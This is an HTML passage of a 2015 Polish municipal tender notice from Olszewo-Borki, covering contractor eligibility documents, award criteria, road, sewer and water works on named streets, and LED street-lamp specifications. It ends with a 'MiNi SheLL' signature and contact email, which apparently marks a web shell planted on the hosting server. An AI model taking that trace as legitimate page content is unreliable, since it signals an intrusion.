<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści umowy w przypadku wystąpienia wcześniej nieprzewidzianej okoliczności, która będzie miała wpływ na należyte wykonanie przedmiotu umowy, w szczególności:
1)zmianę materiałów w trakcie wykonywania robót na inne o tych samych lub lepszych parametrach niż zaoferowane w ofercie, pod warunkiem uzyskania pisemnej akceptacji Zamawiającego;
2)zmianę kierownika budowy lub kierownika robót, w przypadku gdy pełnienie funkcji przez dotychczasową osobę byłoby niemożliwe z jakiegokolwiek powodu; osoba pełniąca funkcje kierownika budowy musi spełniać wymaganie kwalifikacje określone w SIWZ;
3)zmianę wynagrodzenia w przypadku zmiany stawki podatku VAT, wg wskaźników wynikających z wprowadzonych przepisów prawa;
4)zmianę inspektora nadzoru, jeśli pełnienie funkcji przez dotychczasowa osobę stałoby się niemożliwe z jakiejkolwiek przyczyny, o zmianie tej Zamawiający zawiadomi Wykonawcę;
5)zmianę podwykonawców, jeśli współpraca z dotychczasowymi byłaby niemożliwa z jakiegokolwiek powodu, jeśli Wykonawca korzystał z wiedzy i doświadczenia innych podmiotów przy składaniu oferty o których mowa w art. 22 ust 1 ustawy Pzp, na zasadach określonych w art. 26 ust. 2b ustawy Pzp - zobowiązany jest w przypadku zmiany podwykonawców przedstawić Zamawiającemu dokumenty potwierdzające że nowy Podwykonawca posiada co najmniej takie samo doświadczenie i wiedzę, jak ten wskazany w ofercie na podstawie której, oferta Wykonawcy została uznana za najkorzystniejszą;
6)zmianę terminu zakończenia przedmiotu umowy, w przypadku obiektywnie uzasadnionych przyczyn niezależnych od Wykonawcy, zakończenie robót w terminie określonym w umowie stanie się niemożliwe, w szczególności:
a)konieczność wykonania dodatkowych i niemożliwych wcześniej do przewidzenia robót, których realizacja wiąże się z potrzebą zmiany terminu wykonania przedmiotu umowy;
b)nastąpi wstrzymanie robót przez Zamawiającego, w wyniku działania siły wyższej (niesprzyjające warunki atmosferyczne, kataklizm, itp);
c)wystąpi konieczność usunięcia błędów w dokumentacji projektowej w celu prawidłowego wykonania przedmiotu umowy;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.olszewo-borki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Olszewo-Borki
ul. Wł. Broniewskiego 13
07-415 Olszewo-Borki
pok. 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2015 godzina 09:00, miejsce: Urząd Gminy Olszewo-Borki
ul. Wł. Broniewskiego 13
07-415 Olszewo-Borki
pok. 2A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> przedmiot zamówienia realizowany będzie przy dofinansowaniu z programu pn.: Narodowy Program Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój oraz Europejskiego Funduszu Rozwoju Regionalnego w ramach RPO Województwa Mazowieckiego 2007 - 2013 Priorytetu IV Działania 4.1 Gospodarka wodno-ściekowa..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa dróg wraz z infrastrukturą wodno-kanalizacyjną w miejscowości Grabowo i Olszewo-Borki w ulicach: Dojazdowej, 3-go Maja, Czwartaków, Kosynierów, Traugutta, Narutowicza, Lelewela,  Długosza..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części pierwszej zamówienia są roboty budowlane w miejscowości Olszewo-Borki i Grabowo w ulicach: Dojazdowa, 3-go Maja, Czwartaków, Kosynierów, Traugutta, Narutowicza, Lelewela, Długosza, polegające na przebudowie i budowa ulic o łącznej długości 3 226,10mb, budowie ścieżek rowerowych o łącznej długości 1 565,60mb, przebudowie i budowie chodników o łącznej długości 2 617,70mb, budowie zatoki autobusowej, i postojowej, budowie miejsc parkingowych, budowie 222 szt. zjazdów (w tym 11 szt. zjazdów publicznych i 211 szt. zjazdów na posesje prywatne); budowie sieci kanalizacji sanitarnej O160 i O200 wraz z 61 szt. przykanalików o łącznej dł. ok. 1300mb; rurociągu z rur PE O90, dł. 290mb; budowie sieci wodociągowej O90 z przyłączami w pasie drogowym O40 o łącznej dł. 1032,5mb, oznakowaniu poziomym i pionowym ulic, wycince 14 szt. drzew w szczególności: 
1)ul. Dojazdowa o długości 582mb obejmuje roboty budowlane polegające na wykonaniu:
a)jezdni z nakładki z warstwy ścieralnej betonu asfaltowego na istniejący asfalt,
b)chodnika z kostki betonowej brukowej,
c)ścieżki rowerowej z betonu asfaltowego,
d)zatoki autobusowej z kostki kamiennej granitowej,
e)zjazdów bramowych z kostki betonowej brukowej i betonu asfaltowego,
f)sieci kanalizacji sanitarnej z przyłączami,
g)sieci wodociągowej z przyłączami,
h)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznych i zaworów wodociągowych,
i)oznakowania pionowego i poziomego w tym elementów odblaskowych;
2)ul. 3-go Maja o długości 234,00mb (odcinek od ul. Dojazdowej do ul. Lelewela) obejmuje roboty budowlane polegające na wykonaniu:
a)chodnika z kostki betonowej brukowej, 
b)utwardzenia gruntu z kostki betonowej brukowej,
c)utwardzenia gruntu wzdłuż ulicy płytami  eko-ażur,
d)zjazdów bramowych z kostki betonowej brukowej,
e)sieci wodociągowej z przyłączami,
f)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznych i zaworów wodociągowych,
g)oznakowanie pionowego i poziomego.
3)ul. 3-go Maja o długości ok.713mb (odcinek od ul. Dojazdowej do ul. ks. J. Popiełuszki) obejmuje roboty budowlane polegające na wykonaniu:
a)wycinki drzew,
b)jezdni z betonu asfaltowego,
c)ścieżki rowerowej z betonu asfaltowego,
d)parkingów z kostki betonowej brukowej,
e)zjazdów bramowych z kostki betonowej brukowej i betonu asfaltowego,
f)przepustu rurowego pod pasem drogowym, barierki typ olsztyński;
g)oczyszczenia, przegłębienia i umocnienia rowu płytami eko-ażur;
h)umocnienia poboczy płytami eko-ażur;
i)sieci kanalizacji sanitarnej, grawitacyjnej z przyłączami oraz rurociągu z rur PE O90; 
j)sieci wodociągowej z przyłączami,
k)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznych i zaworów wodociągowych,
l)oznakowania pionowego i poziomego w tym elementów odblaskowych.
4)ul. Czwartaków o długości ok. 248mb obejmuje roboty budowlane polegające na wykonaniu:
a)jezdni z kostki betonowej brukowej,
b)chodnika z kostki betonowej brukowej,
c)zjazdów bramowych z kostki betonowej brukowej,
d)odwodnienia jezdni z płyt eko-ażur,
e)sieci kanalizacji sanitarnej z przyłączami,
f)sieci wodociągowej z przyłączami,
g)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych,
5)ul. Kosynierów o długości 250mb obejmuje roboty budowlane polegające na wykonaniu:
a)jezdni z kostki betonowej brukowej,
b)chodnika z kostki betonowej brukowej,
c)zjazdów bramowych z kostki betonowej brukowej,
d)odwodnienia jezdni z płyt eko-ażur,
e)sieci kanalizacji sanitarnej z przyłączami,
f)sieci wodociągowej z przyłączami,
g)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych ;
6)ul. Traugutta o długości 225mb obejmuje roboty budowlane polegające na wykonaniu:
a)jezdni z kostki betonowej brukowej,
b)chodnika z kostki betonowej brukowej,
c)zjazdów betonowych z kostki betonowej brukowej,
d)odwodnienia jezdni z płyt eko-ażur,
e)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych.
7)ul. Narutowicza o długości 168,55mb obejmuje roboty budowlane polegające na wykonaniu:
a)wycinki drzew,
b)jezdni z betonu asfaltowego,
c)chodnika z kostki betonowej brukowej,
d)zjazdów bramowych z kostki betonowej brukowej,
e)odwodnienia jezdni z płyt eko-ażur,
f)sieci kanalizacji sanitarnej z przyłączami,
g)sieci wodociągowej z przyłączami,
h)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych;
8)ul. Lelewela o długości 451mb obejmuje roboty budowlane polegające na wykonaniu:
a)jezdni z nakładki z warstwy ścieralnej betonu asfaltowego na istniejący asfalt,
b)chodnika z kostki betonowej brukowej,
c)zjazdów bramowych z kostki betonowej brukowej,
d)odwodnienia jezdni z płyt eko-ażur,
e)sieci kanalizacji sanitarnej z przyłączami,
f)sieci wodociągowej z przyłączami, 
g)regulacji pionowej istniejących studni kanalizacji sanitarnej, telefonicznej i zaworów wodociągowych;
h)oznakowania pionowego i poziomego.
9)ul. Długosza o długości 358,00mb obejmuje roboty budowlane polegające na wykonaniu:
a)wycinki drzew,
b)jezdni z warstwy ścieralnej z betonu asfaltowego, kostki betonowej brukowej,
c)chodnika z kostki betonowej brukowej,
d)ścieżki rowerowej z betonu asfaltowego,
e)zjazdów bramowych z kostki betonowej brukowej,
f)sieci kanalizacji sanitarnej z przyłączami, 
g)sieci wodociągowej z przyłączami,
h)regulację pionową istniejących studni kanalizacji sanitarnej, telefonicznej ido zaworów wodociągowych,
i)oznakowania pionowego i poziomego;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.31.40-2, 45.23.31.61-5, 45.23.31.62-2, 45.23.32.22-1, 45.23.31.20-6, 45.23.13.00-8, 45.23.32.90-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana lamp oświetleniowych na energooszczędne w miejscowościach Olszewo-Borki i Grabowo w ulicach: Dojazdowa, 3-go Maja, Czwartaków, Kosynierów, Traugutta, G. Narutowicza, Lelewela, Długosza, ks. J. Popiełuszki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)ul. Dojazdowa, na 12 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku  o masie do 15kg,
2)ul. 3-go Maja, na 28 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku  o masie do 15kg,
3)ul. Czwartaków, na 6 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 54W na wysięgniku  o masie do 15kg,
4)ul. Kosynierów, na 7 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 54W na wysięgniku o masie do 15kg, na 1 słupie zamontować szafkę elektryczną sterowniczą,
5)ul. Traugutta, na 6 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 54W na wysięgniku o masie do 15kg,
6)ul. Narutowicza, na 4 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W  na wysięgniku  o masie do 15kg,
7)ul. Lelewela, na 7 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku  o masie do 15kg,
8)ul. Długosza, na 5 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku o masie do 15kg,
9)ul. ks. J. Popiełuszki, na 16 istniejących słupach zamontować oprawy oświetleniowe kompletne typu LED o mocy 72W na wysięgniku o masie do 15kg, na słupie zamontować szafkę elektryczną sterowniczą.
10)oprawa oświetleniowa musi posiadać znak CE - certyfikat potwierdzający wykonanie jej zgodnie z normami europejskimi nadany przez niezależne laboratorium badawcze, posiadające akredytację na terenie Unii Europejskiej, np. certyfikat ENEC; przy ustawieniu 0° w stosunku do podłoża, nie może emitować światła w górną półprzestrzeń zgodnie z Rozporządzeniem Komisji Europejskiej nr 245/2009 z dnia 18 marca 2009 (DZ Urzędowy UE z dnia 24.03.2009r.); musi spełniać wymogi bezpieczeństwa fotobiologicznego lamp i systemów lampowych IEC 62471; skuteczność świetlna oprawy, rozumiana, jako strumień świetlny emitowany przez oprawę z uwzględnieniem wszelkich występujących strat do całkowitej energii zużywanej przez oprawę, jako system, nie może być gorsza niż 90 lumenów/Watt; musi spełniać wymogi I lub II klasy ochronności, stopień szczelności oprawy nie może być mniejszy niż IP 66, zakres temperatur pracy od -30° do +35°;
11)korpus oprawy ma być wykonany z odlewu aluminium stanowiącym jednocześnie radiator oprawy. Korpus nie może posiadać zewnętrznego radiatora w postaci użebrowania, ma być dostępny w dwóch rozmiarach dopasowanych do strumienia świetlnego oprawy, ma być pomalowany proszkowo w kolorze RAL 7035. Źródło światła - panel LED ma być osłonięty płaską szybą ze szkła hartowanego o IK nie gorszym niż IK 08;
12)uchwyt montażowy oprawy musi umożliwiać montaż oprawy zarówno na wysięgniku jak i na słupie o średnicy 48-60 mm oraz regulację położenia oprawy w zakresie -10° do +90° z krokiem nie mniejszym niż 5°;
13)oprawa ma być wyposażona w panel LED o następujących parametrach:
a) temperatura barwowa- naturalna biel 4000K+/- 5%,
b) co najmniej 60 000 h pracy do L80 przy Ta = 25°C (po upływie 60000 godzin świecenia strumień
świetlny nie mniejszy niż 80% strumienia nominalnego oprawy),
c) każda dioda w panelu led musi być wyposażona w indywidualną soczewkę pozwalającą emitować światło równomiernie na całą oświetlaną przez oprawę powierzchnię; w przypadku przepalenia się którejś z diod zmieni się jedynie strumień świetlny a nie rozsył światła,
d) deklarowany strumień świetlny oprawy ma być mierzony w temperaturze otoczenia oprawy nie mniejszej niż 25°C,
e) panel LED musi umożliwiać jego wymianę bez wykonywania połączeń lutowanych.
14) oprawa ma być wyposażona w układ zasilający o następujących cechach:
a) ma osiadać trwałość nie gorszą niż zasilany z niego panel LED,
b) ma zabezpieczać źródło światła przed przepięciami o napięciu co najmniej 10kV,
c) ma mieć możliwość zaprogramowania 5-stopniowej autonomicznej redukcji mocy,
d) ma być wyposażony w zewnętrzny interfejs służący do połączenia oprawy z zewnętrznym komputerem w celu zmian parametrów oświetlenia oraz czynności serwisowych,
e) ma być wyposażony w funkcję utrzymania stałego strumienia świetlnego w czasie,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.31.10-9, 45.32.11.20-2, 45.31.23.11-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com